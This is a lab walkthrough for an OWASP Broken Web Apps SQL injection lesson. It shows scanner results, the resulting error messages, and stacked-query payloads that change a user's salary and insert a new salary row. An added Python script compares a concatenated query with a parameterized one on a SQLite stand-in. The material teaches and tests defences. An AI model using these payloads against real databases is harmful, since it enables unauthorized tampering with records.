OwaspBWA - Modify & Add Data with SQL Injection

Injection flaws - Modify & Add Data with SQL Injection


How To

Result from: SQL Injection Me

Results:

Error string found: 'Column not found'
Tested value: ' OR username IS NOT NULL OR username = '

Error string found: 'Column not found'
Tested value: 1' AND non_existant_table = '1

-----------------------------------------------------


  • 1. OwaspBWA > Submit: ' OR username IS NOT NULL OR username = '
Results (blue = original statement, red = injected statement):

Column not found: USERNAME in statement [SELECT * FROM salaries WHERE userid = '' OR username IS NOT NULL OR username = '']


SQL injection query:
Column not found: USERNAME in statement [SELECT * FROM salaries WHERE userid = ''; UPDATE salaries SET SALARY = 999999 WHERE userid='jsmith']

  • 3. Complete injection update:
'; UPDATE salaries SET SALARY = 999999 WHERE userid='jsmith





OR - Add Data with SQL Injection


'; INSERT INTO salaries (userid,salary) VALUES ('ak1', 999999999);--
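
Both inputs above take effect only because the submitted value is concatenated into the SQL text and the back end accepts a second statement after the `;`. As an added example (not part of the original page or the lesson's code), the Python script below runs both inputs against a constructed in-memory SQLite stand-in for the salaries table, once through a concatenated query and once through a parameterized one; the function names and sample rows are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lesson's salaries table (sample rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE salaries (userid TEXT PRIMARY KEY, salary INTEGER)")
    db.executemany("INSERT INTO salaries VALUES (?, ?)",
                   [("jsmith", 20000), ("lsmith", 45000)])
    db.commit()
    return db

def lookup_vulnerable(db, userid):
    # The input is concatenated into the SQL text. executescript() runs every
    # ';'-separated statement, mirroring a back end that permits stacked queries
    # (sqlite3's execute() would reject more than one statement per call).
    db.executescript("SELECT * FROM salaries WHERE userid = '" + userid + "'")

def lookup_parameterized(db, userid):
    # The input is bound as a value, so it is only ever compared with userid
    # and is never parsed as SQL.
    return db.execute("SELECT * FROM salaries WHERE userid = ?", (userid,)).fetchall()

def snapshot(db):
    """Table contents, used to see whether a lookup changed any data."""
    return db.execute("SELECT userid, salary FROM salaries ORDER BY userid").fetchall()

# The two inputs shown on this page.
UPDATE_INPUT = "'; UPDATE salaries SET SALARY = 999999 WHERE userid='jsmith"
INSERT_INPUT = "'; INSERT INTO salaries (userid,salary) VALUES ('ak1', 999999999);--"

def run(lookup):
    """Feed both inputs to the given lookup on a fresh table and return the table."""
    db = make_db()
    for value in (UPDATE_INPUT, INSERT_INPUT):
        lookup(db, value)
    return snapshot(db)

if __name__ == "__main__":
    print("concatenated :", run(lookup_vulnerable))
    print("parameterized:", run(lookup_parameterized))
```

With the parameterized lookup the table is unchanged after both inputs, which is the property to check for when reviewing the fix.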